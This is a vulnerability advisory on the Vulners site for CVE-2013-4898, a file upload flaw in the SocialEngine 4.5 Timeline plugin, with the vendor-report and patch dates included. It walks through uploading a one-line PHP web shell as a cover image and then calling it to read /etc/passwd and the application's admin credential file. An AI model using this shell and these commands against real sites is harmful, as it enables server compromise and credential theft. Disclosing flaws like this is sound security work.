Vulners
Lucene search
SocialEngine 4.5 Shell Upload
🗓️ 07 Aug 2013 00:00:00Reported by Wesley Henrique LeiteType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | SocialEngine 4.5 Shell Upload Vulnerability | 7 Aug 201300:00 | – | zdt |
 | CVE-2013-4898 | 29 Jan 201418:00 | – | cve |
 | CVE-2013-4898 | 29 Jan 201418:00 | – | cvelist |
 | SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload | 2 Aug 201300:00 | – | exploitdb |
 | EUVD-2013-4743 | 7 Oct 202500:30 | – | euvd |
 | SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload | 2 Aug 201300:00 | – | exploitpack |
 | CVE-2013-4898 | 29 Jan 201418:55 | – | nvd |
 | Unrestricted file upload | 29 Jan 201418:55 | – | prion |
 | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 9 Sep 201300:00 | – | securityvulns |
`+ INTRODUCTION
-------------------------------------------------------------
The plugin has the objective give you a better visual for the user
profile, allowed the addition of cover image keeping the layout closest
to the style of modern social networks, among other features.
+ DESCRIPTION OF VULNERABILITY
-------------------------------------------------------------
Logged into the system, enter on profile page of your user. [my profile]
http://example.com/index.php/profile/[profile-name]
>> Click "Change Cover"
>> Click "Upload Cover"
select the file "*.php" you want to send.
//### Example PHP file to send "inject.php" ###
<?php echo system("$_GET['cmd']"); ?>
//###
After selecting the file upload, this will be sent to an area temporarily,
the system detects that the format is not valid, but doesnt remove,
allowing access later.
an error message is displayed on the screen.
[ File "/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php"
is not an image or does not exist ]
+ ACCESS
-------------------------------------------------------------
/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php
The important thing is the structure of public forward, it will give
us access to our archive.
account operation system
http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd
account credentials admin application
http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php
-------------------------------------------------------------
+ Discovered by: Wesley Henrique Leite ( wesleyhenrique (´) gmail (´) com )
+ Software: SocialEngine 4.5
+ Plugin Link: http://webhive.com.ua/store/product.php?id_product=46
+ Plugin Name+Version : Timeline 4.2.5p9
+ CVE-2013-4898
+ REPORTED TO VENDOR JUL 17 2013
+ PATCH RELEASED JUL 25 2013
-------------------------------------------------------------
--
Wesley Henrique Leite
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Aug 2013 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.08843